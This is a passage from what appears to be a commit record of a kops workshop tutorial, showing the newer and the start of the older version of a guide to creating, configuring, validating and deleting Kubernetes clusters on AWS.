configuration. 
We can create and build the cluster in one step by passing the `--yes` flag.\n\n $ kops create cluster \\\n --name example.cluster.k8s.local \\\n --master-count 3 \\\n --node-count 5 \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nA multi-master cluster can be created by using the `--master-count` option and specifying the number of master nodes. An odd value is recommended. By default, the master nodes are spread across the AZs specified using the `--zones` option. Alternatively, `--master-zones` option can be used to explicitly specify the zones for the master nodes.\n\nThe `--zones` option is also used to distribute the worker nodes. The number of workers is specified using the `--node-count` option.\n\nIt will take 5-8 minutes for the cluster to be created. Validate the cluster:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nmaster-eu-central-1b Master m3.medium 1 1 eu-central-1b\nmaster-eu-central-1c Master c4.large 1 1 eu-central-1c\nnodes Node t2.medium 5 5 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-101-97.ec2.internal node True\nip-172-20-119-53.ec2.internal node True\nip-172-20-124-138.ec2.internal master True\nip-172-20-35-15.ec2.internal master True\nip-172-20-63-104.ec2.internal node True\nip-172-20-69-241.ec2.internal node True\nip-172-20-84-65.ec2.internal node True\nip-172-20-93-167.ec2.internal master True\n\nYour cluster example.cluster.k8s.local is ready\n```\n\nNote that all masters are spread across different AZs.\n\nYour output may differ slightly from the one shown here based up on the type of cluster you created.\n\nimage:next-step-arrow.png[ , title=\"Continue!\"] \nYou are now ready to continue on with the workshop!\nThe next step is link:..\/103-kubernetes-concepts[to learn about basic Kubernetes Concepts].\n\n\n=== (Optional) Create a Kubernetes cluster in a private VPC\n\nkops can create a private Kubernetes cluster, where the master and worker nodes are launched in private subnets in a VPC. This is possible with both Gossip and DNS-based clusters. This reduces the attack surface on your instances by protecting them behind security groups inside private subnets. The services hosted in the cluster can still be exposed via internet-facing ELBs if required. It's necessary to run a CNI network provider in the Kubernetes cluster when using a private topology. We have used https:\/\/www.projectcalico.org\/[Calico] below, though other options such as `kopeio-vxlan`, `weave`, `romano` and others are available.\n\nTo print full list of CNI providers:\n\n kops create cluster --help\n\nCreate a gossip-based private cluster with master and worker nodes in private subnets:\n\n $ kops create cluster \\\n --networking calico \\\n --topology private \\\n --name example.cluster.k8s.local \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nOnce the `kops create cluster` command is issued, it provisions the EC2 instances, sets up AutoScaling Groups, IAM users, Security Groups, installs Kubernetes on each node, then configures the master and worker nodes. 
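Provisioning happens asynchronously, so `kops validate cluster` will keep reporting failures until all instances have joined. One way to wait without watching the terminal is a small polling loop (a sketch; the 30-second interval is an arbitrary choice):

```bash
# Sketch: poll validation until the cluster reports ready.
until kops validate cluster --name example.cluster.k8s.local; do
  echo "Cluster not ready yet; retrying in 30s..."
  sleep 30
done
```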
This process can take some time based upon the number of master and worker nodes.\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-124-144.eu-central-1.compute.internal node True\nip-172-20-58-179.eu-central-1.compute.internal master True\nip-172-20-93-220.eu-central-1.compute.internal node True\n\nYour cluster example.cluster.k8s.local is ready\n```\n\nIt is also possible to create a DNS-based cluster where the master and worker nodes are in private subnets. For more information about creating DNS-based clusters, see Appendix: Create a DNS-based Kubernetes cluster below.\nIf `--dns private` is also specified, a Route53 private hosted zone is created for routing the traffic for the domain within one or more VPCs. The Kubernetes API can therefore only be accessed from within the VPC. This is a current issue with kops (see https:\/\/github.com\/kubernetes\/kops\/issues\/2032). A possible workaround is to mirror the private Route53 hosted zone with a public hosted zone that exposes only the API server ELB endpoint. This workaround is discussed http:\/\/kubecloud.io\/setup-ha-k8s-kops\/[here].\n\nAlthough most of the exercises in this workshop should work on a cluster with a private VPC, some commands won't, specifically those that use a proxy to access internally hosted services.\n\n== Kubernetes Cluster Context\n\nYou may create multiple Kubernetes clusters. The configuration for each cluster is stored in a configuration file, referred to as \"`kubeconfig file`\". By default, kubectl looks for a file named `config` in the directory `~\/.kube`. The kubectl CLI uses the kubeconfig file to find the information it needs to choose a cluster and communicate with the API server of a cluster.\n\nThis allows you to deploy your applications to different environments by just changing the context. For example, here is a typical flow for application development:\n\n. Build your application using minikube (See Set up Local Development Environment for more information)\n. Change the context to a test cluster created on AWS\n. Use the same command to deploy to the test environment\n. Once satisfied, change the context again to a production cluster on AWS\n. Once again, use the same command to deploy to the production environment\n\nGet a summary of available contexts:\n\n $ kubectl config get-contexts\n CURRENT NAME CLUSTER AUTHINFO NAMESPACE\n * example.cluster.k8s.local example.cluster.k8s.local example.cluster.k8s.local\n minikube minikube minikube\n\nThe output shows different contexts, one per cluster, that are available to kubectl. The `NAME` column shows the context name. `*` indicates the current context.\n\nView the current context:\n\n $ kubectl config current-context\n example.cluster.k8s.local\n\nIf multiple clusters exist, then you can change the context:\n\n $ kubectl config use-context <config-name>\n\n== Turn on an API version for your Cluster\n\nNote: This section is for Kubernetes 1.7.x; in 1.8.x the API is `batch\/v1beta1`. \n\nKubernetes resources are created with a specific API version. The exact value is defined by the `apiVersion` attribute in the resource configuration file, as in the sketch below. 
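As a concrete illustration, here is a minimal CronJob manifest (the job name and schedule are hypothetical) that names the alpha API version this section is about. On a 1.7.x cluster, creating it fails until `batch/v2alpha1` has been enabled as described below:

```bash
# Sketch: a minimal CronJob manifest (hypothetical name/schedule) written to disk.
cat <<'EOF' > hello-cronjob.yaml
apiVersion: batch/v2alpha1   # the attribute this section is about
kind: CronJob
metadata:
  name: hello
spec:
  schedule: "*/1 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: hello
            image: busybox
            args: ["/bin/sh", "-c", "date; echo hello"]
          restartPolicy: OnFailure
EOF

# Fails with "no matches for kind CronJob" until batch/v2alpha1 is enabled.
kubectl create -f hello-cronjob.yaml
```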
Some of the values are `v1`, `extensions\/v1beta1` or `batch\/v1`. By default, resources with stable and beta `apiVersion` values are enabled. If a resource has a version with the word `alpha` in it, then that version needs to be explicitly enabled in the cluster. For example, if you are running a Kubernetes cluster of version 1.7.x, then the Cron Job resource cannot be created unless `batch\/v2alpha1` is explicitly enabled.\n\nThis section shows how to turn on an API version for your cluster. It will use `batch\/v2alpha1` as an example.\n\nSpecific API versions can be turned on or off by passing the `--runtime-config=api\/<version>` flag while bringing up the API server. To turn on our specific version, we'll need to pass `--runtime-config=batch\/v2alpha1=true`.\n\nFor a cluster created using kops, this can be done by editing the cluster configuration using the command shown:\n\n $ kops edit cluster --name example.cluster.k8s.local\n\nThis will open up the cluster configuration in a text editor. Update the `spec` attribute so that it looks as shown:\n\n spec:\n kubeAPIServer:\n runtimeConfig:\n batch\/v2alpha1: \"true\"\n api:\n\nSave the changes and exit the editor. The Kubernetes cluster needs to re-read the configuration. This can be done by forcing a rolling update of the cluster using the following command:\n\nNOTE: This process can easily take 30-45 minutes. It's recommended to leave the cluster without any updates during that time.\n\n $ kops rolling-update cluster --yes\n Using cluster from kubectl context: example.cluster.k8s.local\n\n NAME STATUS NEEDUPDATE READY MIN MAX NODES\n master-eu-central-1a Ready 0 1 1 1 1\n nodes Ready 0 2 2 2 2\n I1025 20:50:51.158013 354 instancegroups.go:350] Stopping instance \"i-0ba714556f0f892cc\", node \"ip-172-20-58-179.eu-central-1.compute.internal\", in AWS ASG \"master-eu-central-1a.masters.example.cluster.k8s.local\".\n I1025 20:55:51.413506 354 instancegroups.go:350] Stopping instance \"i-0265a07c3320b266b\", node \"ip-172-20-93-220.eu-central-1.compute.internal\", in AWS ASG \"nodes.example.cluster.k8s.local\".\n I1025 20:57:52.448582 354 instancegroups.go:350] Stopping instance \"i-09e2efd9f5e9ebfce\", node \"ip-172-20-124-144.eu-central-1.compute.internal\", in AWS ASG \"nodes.example.cluster.k8s.local\".\n I1025 20:59:53.325980 354 rollingupdate.go:174] Rolling update completed!\n\nThis command will first stop one master node in the cluster, re-read the configuration information and start that master. Then it will do the same for the rest of the master nodes. And then it will repeat that for each worker node in the cluster. After all the server and worker nodes have been restarted, the rolling update of the cluster is complete.\n\nLet's verify that the attributes are now successfully passed to the API server. Get the list of pods for the API server using the command shown:\n\n $ kubectl get pods --all-namespaces | grep kube-apiserver\n kube-system kube-apiserver-ip-172-20-117-32.ec2.internal 1\/1 Running 0 7m\n kube-system kube-apiserver-ip-172-20-62-108.ec2.internal 1\/1 Running 6 16m\n kube-system kube-apiserver-ip-172-20-79-64.ec2.internal 1\/1 Running 2 12m\n\nThe output shows three pods, one for each API server, corresponding to the three master nodes. This output is from a cluster with three master nodes; the sketch below shows a quick way to count them. 
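As a quick sanity check, the number of `kube-apiserver` pods should match the number of masters. A one-line sketch:

```bash
# Count the kube-apiserver pods; the result should equal the master count (3 here).
kubectl get pods --namespace=kube-system | grep -c kube-apiserver
```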
The output may be different if your cluster was created with a different number of masters.\n\nSearch for the `--runtime-config` option as shown:\n\n $ kubectl describe --namespace=kube-system pod <pod-name> | grep runtime\n\n`<pod-name>` is the name of one of the pods shown above.\n\nA formatted output is shown below:\n\n \/usr\/local\/bin\/kube-apiserver \\\n --address=127.0.0.1 \\\n --admission-control=NamespaceLifecycle,LimitRanger,ServiceAccount,PersistentVolumeLabel,DefaultStorageClass,DefaultTolerationSeconds,ResourceQuota \\\n --allow-privileged=true \\\n --anonymous-auth=false \\\n --apiserver-count=3 \\\n --authorization-mode=AlwaysAllow \\\n --basic-auth-file=\/srv\/kubernetes\/basic_auth.csv \\\n --client-ca-file=\/srv\/kubernetes\/ca.crt \\\n --cloud-provider=aws \\\n --etcd-servers-overrides=\/events#http:\/\/127.0.0.1:4002 \\\n --etcd-servers=http:\/\/127.0.0.1:4001 --insecure-port=8080 --kubelet-preferred-address-types=InternalIP,Hostname,ExternalIP \\\n --runtime-config=batch\/v2alpha1=true \\\n --secure-port=443 \\\n --service-cluster-ip-range=100.64.0.0\/13 \\\n --storage-backend=etcd2 \\\n --tls-cert-file=\/srv\/kubernetes\/server.cert \\\n --tls-private-key-file=\/srv\/kubernetes\/server.key \\\n --token-auth-file=\/srv\/kubernetes\/known_tokens.csv \\\n --v=2 \\\n 1>>\/var\/log\/kube-apiserver.log 2>&1\n\nThe output clearly shows that `--runtime-config=batch\/v2alpha1=true` is passed as an option to the API server. This means the cluster is now ready for creating APIs with version `batch\/v2alpha1`.\n\n== Instance Groups with kops\n\nAn instance group, or ig for short, is a kops concept that defines a grouping of similar nodes. In AWS, an instance group maps to an Auto Scaling Group (ASG). Instructions on how to create instance groups can be found link:instance-groups\/readme.adoc[here].\n\n== Delete A Cluster\n\nAny cluster can be deleted as shown:\n\n $ kops delete cluster \\\n <cluster-name> \\\n --yes\n\n`<cluster-name>` is the name of the cluster. For example, our `example.cluster.k8s.local` cluster can be deleted as:\n\n $ kops delete cluster \\\n example.cluster.k8s.local \\\n --yes\n\nIf you leave off the `--yes` flag, you will get a listing of all the resources kops will delete. To confirm deletion, run the command again appending `--yes`.\n\nIf you created a private VPC, then an additional cleanup of resources is required as shown below:\n\n # Find the Route53 hosted zone ID from the console or via the CLI and delete the hosted zone\n aws route53 delete-hosted-zone --id $ZONEID\n # Delete the VPC if you created it earlier\n aws ec2 detach-internet-gateway --internet-gateway-id $IGW --vpc-id $VPCID\n aws ec2 delete-internet-gateway --internet-gateway-id $IGW\n aws ec2 delete-vpc --vpc-id $VPCID\n\nTo remove the state store S3 bucket:\n\n aws s3 rb $KOPS_STATE_STORE\n\n== Appendix: Create a DNS-based Kubernetes cluster\n\nTo create a DNS-based Kubernetes cluster you'll need a top-level domain or subdomain that meets one of the following scenarios:\n\n. Domain purchased\/hosted via AWS\n. A subdomain under a domain purchased\/hosted via AWS\n. Setting up Route53 for a domain purchased with another registrar, transferring the domain to Route53\n. Subdomain for clusters in Route53, leaving the domain at another registrar\n\nThen you need to follow the instructions in https:\/\/github.com\/kubernetes\/kops\/blob\/master\/docs\/aws.md#configure-dns[configure DNS]; for the subdomain scenario (the last bullet), a sketch follows below. 
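The Route53 hosted zone for such a subdomain can be created with the AWS CLI. The domain below is hypothetical; after the zone exists, its NS records must be delegated from the parent domain for resolution to work:

```bash
# Sketch: create a hosted zone for a hypothetical subdomain and capture its ID.
aws route53 create-hosted-zone \
  --name subdomain.example.com \
  --caller-reference "$(uuidgen)" \
  --query 'HostedZone.Id' --output text
# Then copy the new zone's NS records into the parent domain as a delegation.
```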
Typically, the first and the last bullets are common scenarios.\n\n==== Default DNS-based cluster\n\nBy default, the `create cluster` command creates a single master node and two worker nodes in the specified zones.\n\nCreate a Kubernetes cluster using the following command. For the purposes of this demonstration, we will use a cluster name of example.cluster.com as our registered DNS. This will create a cluster with a single master, multi-node and multi-az configuration:\n\n $ kops create cluster \\\n --name example.cluster.com \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nThe `create cluster` command only creates and stores the cluster config in the S3 bucket. Adding the `--yes` option ensures that the cluster is immediately created as well.\n\nAlternatively, you may leave off the `--yes` option from the `kops create cluster` command. This will allow you to use the `kops edit cluster example.cluster.com` command to view the current cluster state and make changes before actually creating the cluster. \n\nThe cluster creation, in that case, is started with the following command:\n\n $ kops update cluster example.cluster.com --yes\n\nOnce the `kops create cluster` or `kops update cluster` command is issued with the `--yes` flag, it provisions the EC2 instances, sets up Auto Scaling Groups, IAM users, and security groups, installs Kubernetes on each node, and configures the master and worker nodes. This process can take a few minutes based upon the number of master and worker nodes.\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster --name=example.cluster.com\nValidating cluster example.cluster.com\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-51-232.ec2.internal node True\nip-172-20-60-192.ec2.internal master True\nip-172-20-91-39.ec2.internal node True\n\nYour cluster example.cluster.com is ready\n```\n\nVerify the client and server version:\n\n $ kubectl version\n Client Version: version.Info{Major:\"1\", Minor:\"8\", GitVersion:\"v1.8.1\", GitCommit:\"f38e43b221d08850172a9a4ea785a86a3ffa3b3a\", GitTreeState:\"clean\", BuildDate:\"2017-10-12T00:45:05Z\", GoVersion:\"go1.9.1\", Compiler:\"gc\", Platform:\"darwin\/amd64\"}\n Server Version: version.Info{Major:\"1\", Minor:\"7\", GitVersion:\"v1.7.4\", GitCommit:\"793658f2d7ca7f064d2bdf606519f9fe1229c381\", GitTreeState:\"clean\", BuildDate:\"2017-08-17T08:30:51Z\", GoVersion:\"go1.8.3\", Compiler:\"gc\", Platform:\"linux\/amd64\"}\n\nIt shows that the kubectl CLI version is 1.8.1 and the server version is 1.7.4. The cluster version may change depending on the kops version.\n\n==== Multi-master, multi-node, multi-az DNS-based cluster\n\nCheck the list of Availability Zones that exist for your region using the following command:\n\n $ aws --region <region> ec2 describe-availability-zones\n\nCreate a cluster with multi-master, multi-node and multi-az configuration. We can create and build the cluster in\none step by passing the `--yes` flag.\n\n $ kops create cluster \\\n --name example.cluster.com \\\n --master-count 3 \\\n --node-count 5 \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nA multi-master cluster can be created by using the `--master-count` option and specifying the number of master nodes. An odd value is recommended. By default, the master nodes are spread across the AZs specified using the `--zones` option. 
Alternatively, `--master-zones` option can be used to explicitly specify the zones for the master nodes.\n\n`--zones` option is also used to distribute the worker nodes. The number of workers is specified using the `--node-count` option.\n\nAs mentioned above, wait for 5-8 minutes for the cluster to be created. Validate the cluster:\n\n```\n$ kops validate cluster --name=example.cluster.com\nValidating cluster example.cluster.com\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nmaster-eu-central-1b Master m3.medium 1 1 eu-central-1b\nmaster-eu-central-1c Master c4.large 1 1 eu-central-1c\nnodes Node t2.medium 5 5 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-103-30.ec2.internal master True\nip-172-20-105-16.ec2.internal node True\nip-172-20-127-147.ec2.internal node True\nip-172-20-35-38.ec2.internal node True\nip-172-20-47-199.ec2.internal node True\nip-172-20-61-207.ec2.internal master True\nip-172-20-75-78.ec2.internal master True\nip-172-20-94-216.ec2.internal node True\n\nYour cluster example.cluster.com is ready\n```\n\nNote that all masters are spread across different AZs.\n\nYour output may differ from the one shown here based up on the type of cluster you created.\n\nYou are now ready to link:..\/103-kubernetes-concepts[continue on with the workshop.]\n","old_contents":"= Create A Kubernetes Cluster Using kops\n:toc:\n:icons:\n:linkcss:\n:imagesdir: ..\/..\/resources\/images\n\nThis tutorial will walk you through how to install a Kubernetes cluster on AWS using kops.\n\nhttps:\/\/github.com\/kubernetes\/kops[kops], short for Kubernetes Operations, is a set of tools for installing, operating, and deleting Kubernetes clusters. kops can also perform rolling upgrades from older versions of Kubernetes to newer ones. kops also manages the cluster add-ons. After the cluster is created, the link:..\/prereqs.adoc[Kubernetes CLI] can be used to manage resources in the cluster. If you have not gone through the link:..\/prereqs.adoc[Prerequisites] section, please do so now before continuing.\n\nIf you have not set up the link:..\/101-start-here[Cloud9 Devlopment Environment] yet, please do so before continuing.\n\n== Create A Cluster with kops\n\nThe kops CLI can be used to create a highly available cluster, with multiple master nodes spread across multiple Availability Zones. Workers can be spread across multiple zones as well. Some of the tasks that happen behind the scene during cluster creation are:\n\n- Provisioning EC2 instances\n- Creating and configuring AWS resources such as a VPC, Auto Scaling Groups, IAM users, and security groups\n- Installing Kubernetes\n- If required configuring Route53 DNS\n\nWhen setting up a cluster you have two options on how the nodes in the cluster communicate:\n\n. <<create-a-gossip-based-kubernetes-cluster-with-kops, Using the gossip protocol>> - kops has support for a gossip-based cluster. This does not require a domain, subdomain, or Route53 hosted zone to be registered. A gossip-based cluster is therefore easier and quicker to setup, and is the preferred method for creating a cluster for use with this workshop.\n. <<appendix-create-a-dns-based-kubernetes-cluster, Using DNS>> - Creating a Kubernetes cluster that uses DNS for node discovery requires your own domain (or subdomain) and setting up Route 53 hosted zones. 
This allows the various Kubernetes components to use DNS resolutions find and communicate with each other, and for kubectl to be able to talk directly with the master node(s).\n\nInstructions for creating a gossip-based cluster are provided below, however, the examples in the workshop should work with either option. Instructions for creating a DNS-based cluster are provided as an appendix at the bottom of this page.\n\n=== Create a Gossip Based Kubernetes Cluster with kops\n\nkops supports creating a gossip-based cluster, which uses https:\/\/github.com\/weaveworks\/mesh[Weave Mesh] behind the scenes. This makes the process of creating a Kubernetes cluster using kops DNS-free, and therefore much simpler. This also means a top-level domain or a subdomain is no longer required to create the cluster. To create a cluster using the gossip protocol, indicate this to by using a cluster name with a suffix of `.k8s.local`. In the following steps, we will use example.cluster.k8s.local as a sample gossip cluster name. You may choose a different name as long as it ends with `.k8s.local`.\n\nInformation on setting up a DNS-based cluster can be found at the bottom of this page in the Appendix. However, setting up a gossip-based cluster allows you to get started quickly.\n\nWe show two examples of creating gossip-based clusters below. You can choose whether to create a single-master or multi-master cluster. Most workshop exercises will work on both types of cluster, however some modules require using a multi-master cluster (to demonstrate rolling updates, for instance.) If you aren't sure, please create a <<multi-master-multi-node-multi-az-gossip-based-cluster, multi-master cluster.>>\n\n==== Default Gossip Based Cluster\n\nBy default, `create cluster` command creates a single master node and two worker nodes in the specified zones.\n\nCreate a Kubernetes cluster using the following command. This will create a cluster with a single master, multi-node and multi-az configuration:\n\n $ kops create cluster \\\n --name example.cluster.k8s.local \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nThe `AWS_AVAILABILITY_ZONES` environment variable should have been set during the link:..\/101-start-here[Cloud9 Environment Setup].\n\nThe `create cluster` command only creates and stores the cluster config in the S3 bucket. Adding the `--yes` flag ensures that the cluster is immediately created as well.\n\nAlternatively, you may not specify the `--yes` flag as part of the `kops create cluster` command. Then you can use `kops edit cluster example.cluster.k8s.local` command to view the current cluster state and make changes. The cluster creation, in that case, is started with the following command:\n\n $ kops update cluster example.cluster.k8s.local --yes\n\nOnce the `kops create cluster` command is issued, it provisions the EC2 instances, sets up Auto Scaling Groups, IAM users, Security Groups, installs Kubernetes on each node, then configures the master and worker nodes. 
This process can take some time based upon the number of master and worker nodes.\n\nNote: If your 'create cluster' fails with an error like:\n```\nerror reading s3:\/\/example-kops-state-store-workshop\/workshop-prep.cluster.k8s.local\/config: Unable to list AWS regions: NoCredentialProviders: no valid providers in chain\ncaused by: EnvAccessKeyNotFound: failed to find credentials in the environment.\"\n```\n, try setting the following environment variables before executing the 'create cluster' command:\n```\nexport AWS_DEFAULT_PROFILE=<your_aws_credentials_profile_name>\nexport AWS_SDK_LOAD_CONFIG=1\n```\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-57-94.ec2.internal master True\nip-172-20-63-55.ec2.internal node True\nip-172-20-75-78.ec2.internal node True\n\nYour cluster example.cluster.k8s.local is ready\n```\n==== Multi-master, multi-node, multi-az Gossip Based Cluster\n\nCreate a cluster with multi-master, multi-node and multi-az configuration. We can create and build the cluster in one step by passing the `--yes` flag.\n\n $ kops create cluster \\\n --name example.cluster.k8s.local \\\n --master-count 3 \\\n --node-count 5 \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nA multi-master cluster can be created by using the `--master-count` option and specifying the number of master nodes. An odd value is recommended. By default, the master nodes are spread across the AZs specified using the `--zones` option. Alternatively, `--master-zones` option can be used to explicitly specify the zones for the master nodes.\n\nThe `--zones` option is also used to distribute the worker nodes. The number of workers is specified using the `--node-count` option.\n\nIt will take 5-8 minutes for the cluster to be created. 
Validate the cluster:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nmaster-eu-central-1b Master m3.medium 1 1 eu-central-1b\nmaster-eu-central-1c Master c4.large 1 1 eu-central-1c\nnodes Node t2.medium 5 5 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-101-97.ec2.internal node True\nip-172-20-119-53.ec2.internal node True\nip-172-20-124-138.ec2.internal master True\nip-172-20-35-15.ec2.internal master True\nip-172-20-63-104.ec2.internal node True\nip-172-20-69-241.ec2.internal node True\nip-172-20-84-65.ec2.internal node True\nip-172-20-93-167.ec2.internal master True\n\nYour cluster example.cluster.k8s.local is ready\n```\n\nNote that all masters are spread across different AZs.\n\nYour output may differ slightly from the one shown here based up on the type of cluster you created.\n\nimage:next-step-arrow.png[ , title=\"Continue!\"] You are now ready to continue on with the workshop!\nThe next step is link:..\/103-kubernetes-concepts[to learn about basic Kubernetes Concepts].\n\n\n=== (Optional) Create a Kubernetes cluster in a private VPC\n\nkops can create a private Kubernetes cluster, where the master and worker nodes are launched in private subnets in a VPC. This is possible with both Gossip and DNS-based clusters. This reduces the attack surface on your instances by protecting them behind security groups inside private subnets. The services hosted in the cluster can still be exposed via internet-facing ELBs if required. It's necessary to run a CNI network provider in the Kubernetes cluster when using a private topology. We have used https:\/\/www.projectcalico.org\/[Calico] below, though other options such as `kopeio-vxlan`, `weave`, `romano` and others are available.\n\nTo print full list of CNI providers:\n\n kops create cluster --help\n\nCreate a gossip-based private cluster with master and worker nodes in private subnets:\n\n $ kops create cluster \\\n --networking calico \\\n --topology private \\\n --name example.cluster.k8s.local \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nOnce the `kops create cluster` command is issued, it provisions the EC2 instances, sets up AutoScaling Groups, IAM users, Security Groups, installs Kubernetes on each node, then configures the master and worker nodes. This process can take some time based upon the number of master and worker nodes.\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b,eu-central-1c\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-124-144.eu-central-1.compute.internal node True\nip-172-20-58-179.eu-central-1.compute.internal master True\nip-172-20-93-220.eu-central-1.compute.internal node True\n\nYour cluster example.cluster.k8s.local is ready\n```\n\nIt is also possible to create a DNS-based cluster where the master and worker nodes are in private subnets. 
For more information about creating DNS-based clusters, see Appendix: Create a DNS-based Kubernetes cluster below.\nIf `--dns private` is also specified, a Route53 private hosted zone is created for routing the traffic for the domain within one or more VPCs. The Kubernetes API can therefore only be accessed from within the VPC. This is a current issue with kops (see https:\/\/github.com\/kubernetes\/kops\/issues\/2032). A possible workaround is to mirror the private Route53 hosted zone with a public hosted zone that exposes only the API server ELB endpoint. This workaround is discussed http:\/\/kubecloud.io\/setup-ha-k8s-kops\/[here].\n\nAlthough most of the exercises in this workshop should work on a cluster with a private VPC, some commands won't, specifically those that use a proxy to access internally hosted services.\n\n== Kubernetes Cluster Context\n\nYou may create multiple Kubernetes clusters. The configuration for each cluster is stored in a configuration file, referred to as \"`kubeconfig file`\". By default, kubectl looks for a file named `config` in the directory `~\/.kube`. The kubectl CLI uses kubeconfig file to find the information it needs to choose a cluster and communicate with the API server of a cluster.\n\nThis allows you to deploy your applications to different environments by just changing the context. For example, here is a typical flow for application development:\n\n. Build your application using minikube (See Set up Local Development Environment for more information)\n. Change the context to a test cluster created on AWS\n. Use the same command to deploy to test environment\n. Once satisfied, change the context again to a production cluster on AWS\n. Once again, use the same command to deploy to production environment\n\nGet a summary of available contexts:\n\n $ kubectl config get-contexts\n kubectl config get-contexts\n CURRENT NAME CLUSTER AUTHINFO NAMESPACE\n * example.cluster.k8s.local example.cluster.k8s.local example.cluster.k8s.local\n minikube minikube minikube\n\nThe output shows dfferent contexts, one per cluster, that are available to kubectl. `NAME` column shows the context name. `*` indicates the current context.\n\nView the current context:\n\n $ kubectl config current-context\n example.cluster.k8s.local\n\nIf multiple clusters exist, then you can change the context:\n\n $ kubectl config use-context <config-name>\n\n== Turn on an API version for your Cluster\n\nNote: This section is for Kubebernetes 1.7.x, in 1.8.x the api is `batch\/v1beta1`. \n\nKubernetes resources are created with a specific API version. The exact value is defined by the `apiVersion` attribute in the resource configuration file. Some of the values are `v1`, `extensions\/v1beta1` or `batch\/v1`. By default, resources with `apiVersion` values X, Y, Z are enabled. If a resource has a version with the word `alpha` in it, then that version needs to be explicitly enabled in the cluster. For example, if you are running a Kubernetes cluster of version 1.7.x, then Cron Job resource cannot be created unless `batch\/v2alpha1` is explicitly enabled.\n\nThis section shows how to turn on an API version for your cluster. It will use `batch\/v2alpha1` as an example.\n\nSpecific API versions can be turned on or off by passing `--runtime-config=api\/<version>` flag while bringing up the API server. 
To turn on our specific version, we'll need to pass `--runtime-config=batch\/v2alpha1=true`.\n\nFor a cluster created using kops, this can be done by editing the cluster configuration using the command shown:\n\n $ kops edit cluster --name example.cluster.k8s.local\n\nThis will open up the cluster configuration in a text editor. Update the `spec` attribute such that it looks like as shown:\n\n spec:\n kubeAPIServer:\n runtimeConfig:\n batch\/v2alpha1: \"true\"\n api:\n\nSave the changes and exit the editor. Kubernetes cluster needs to re-read the configuration. This can be done by forcing a rolling update of the cluster using the following command:\n\nNOTE: This process can easily take 30-45 minutes. Its recommended to leave the cluster without any updates during that time.\n\n $ kops rolling-update cluster --yes\n Using cluster from kubectl context: example.cluster.k8s.local\n\n NAME STATUS NEEDUPDATE READY MIN MAX NODES\n master-eu-central-1a Ready 0 1 1 1 1\n nodes Ready 0 2 2 2 2\n I1025 20:50:51.158013 354 instancegroups.go:350] Stopping instance \"i-0ba714556f0f892cc\", node \"ip-172-20-58-179.eu-central-1.compute.internal\", in AWS ASG \"master-eu-central-1a.masters.example.cluster.k8s.local\".\n I1025 20:55:51.413506 354 instancegroups.go:350] Stopping instance \"i-0265a07c3320b266b\", node \"ip-172-20-93-220.eu-central-1.compute.internal\", in AWS ASG \"nodes.example.cluster.k8s.local\".\n I1025 20:57:52.448582 354 instancegroups.go:350] Stopping instance \"i-09e2efd9f5e9ebfce\", node \"ip-172-20-124-144.eu-central-1.compute.internal\", in AWS ASG \"nodes.example.cluster.k8s.local\".\n I1025 20:59:53.325980 354 rollingupdate.go:174] Rolling update completed!\n\nThis command will first stop one master node in the cluster, re-read the configuration information and start that master. Then it will do the same for rest of the master nodes. And then it will repeat that for each worker node in the cluster. After all the server and worker nodes have been restarted, the rolling update of the cluster is complete.\n\nLet's verify that the attributes are now successfully passed to the API server. Get the list of pods for the API server using the command shown:\n\n $ kubectl get pods --all-namespaces | grep kube-apiserver\n kube-system 